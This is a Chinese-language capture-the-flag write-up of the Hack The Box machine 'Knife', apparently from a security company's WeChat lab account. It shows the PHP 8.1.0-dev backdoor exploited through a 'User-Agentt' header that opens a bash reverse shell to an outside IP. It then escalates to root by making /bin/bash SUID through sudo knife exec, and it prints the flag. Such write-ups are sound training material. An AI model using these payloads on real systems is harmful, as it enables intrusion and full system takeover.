0x01 靶场描述
Hack the box 是国外的一个靶机平台,里面的靶机包含多种系统类型,并且里面可以利用的漏洞类型多种多样,有很多靶机其实非常贴近实战情景。因此 HTB 是一个很好的学习渗透测试靶场,官网:https://www.hackthebox.eu/invite。knife特性如图:
0x02 靶场复现
知识点: 端口、漏洞扫描、PHP 8.1.0-dev 版本在2021年3月28日被植入后门、sudo提权
一、端口、漏洞扫描,发现存在PHP8.1.0-dev后门
1.使用nmap扫描,发现该目标开启了22和80端口
nmap -sC -sV 10.10.10.242 #-sC调用脚本 -sV识别系统版本
2.nikto扫描该网站,发现存在x-powered-by header: PHP/8.1.0-dev参数,该参数在是由于PHP 8.1.0-dev 版本在2021年3月28日被植入后门
添加User-Agentt头执行反弹shell命令:
User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.3/7777
0>&1'");
3.成功获取到一个用户名为james的shell
4.查找python3并调试命令行交互
which python3
python3 -c 'import pty; pty.spawn("/bin/bash")'
二、sudo提权
1.sudo -l发现本用户可以nopass通过root权限执行/usr/bin/knife这个文件
sudo -l
2.进行提权
1.切换到~目录
cd ~
2.编写脚本,该脚本意思是通过某用户某文件执行root的/bin/bash
echo "system('chmod +s /bin/bash')" > exploit.rb
3.通过本用户sudo /usr/bin/knife执行root的/bin/bash
sudo /usr/bin/knife exec exploit.rb
4.查看/bin/bash权限,发现普通管理员均可执行
ls -al /bin/bash
5.执行/bin/bash获得root权限
/bin/bash -p
6.查看flag
cat root.txt #03097c1de2493c1bbcdd37816d2e0b69
(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)
0x03 公司简介
江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......
编制:sm
审核:fjh
审核:Dog
原文始发于微信公众号(融云攻防实验室):Hack The Box-knife
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论